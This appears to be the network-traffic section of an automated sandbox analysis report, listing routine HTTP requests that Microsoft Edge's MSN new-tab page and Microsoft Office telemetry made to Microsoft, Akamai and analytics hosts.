Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1731116851926&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a598ac3b3e2d48a2b71daf2c0b512480&activityId=a598ac3b3e2d48a2b71daf2c0b512480&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=1A1E8714CE116135161B9226CFE060A6; _EDGE_S=F=1&SID=14F9B7E8AA396BDD1722A2DAAB0C6AEE; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=1A1E8714CE116135161B9226CFE060A6&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-2063246587742936609&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=48fbe1119c6440f9dd284a672113c0f0 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=1A1E8714CE116135161B9226CFE060A6; _EDGE_S=F=1&SID=14F9B7E8AA396BDD1722A2DAAB0C6AEE; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msBaE.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1731116851926&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1A1E8714CE116135161B9226CFE060A6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1483c6dd5b8c2c4ddd31efe1731116854; XID=1483c6dd5b8c2c4ddd31efe1731116854
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=1A1E8714CE116135161B9226CFE060A6&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-2063246587742936609&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=3f5484eb91cb4fa8d900b5156dcfa066 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1A1E8714CE116135161B9226CFE060A6; _EDGE_S=F=1&SID=14F9B7E8AA396BDD1722A2DAAB0C6AEE; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1731116851926&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a598ac3b3e2d48a2b71daf2c0b512480&activityId=a598ac3b3e2d48a2b71daf2c0b512480&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=3A66BFEA2F024D7D9C9C07749E98C1C6&MUID=1A1E8714CE116135161B9226CFE060A6 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1A1E8714CE116135161B9226CFE060A6; _EDGE_S=F=1&SID=14F9B7E8AA396BDD1722A2DAAB0C6AEE; _EDGE_V=1; SM=T
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msDBP.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msyCF.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msMCf.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
